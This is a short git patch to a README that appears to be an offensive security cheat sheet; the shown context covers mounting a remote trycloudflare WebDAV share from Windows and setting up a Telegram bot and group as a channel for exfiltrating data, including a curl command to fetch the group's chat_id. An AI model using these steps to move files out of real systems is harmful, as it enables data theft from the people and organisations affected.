From 8ed241962dfb1c04c06cbb8bab874dee89c44625 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 1 Jul 2023 16:54:45 +0100 Subject: [PATCH] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d5f6b4e..9d8dfe9 100644 --- a/README.md +++ b/README.md @@ -905,6 +905,7 @@ net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources There are [zillions of upload services](#cloudexfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group: ```sh curl -s "https://api.telegram.org/bot/getUpdates" | jq -r '.result[].message.chat.id' | uniq +# If you get only {"ok":true,"result":[]} then remove and add the bot again. ``` ```sh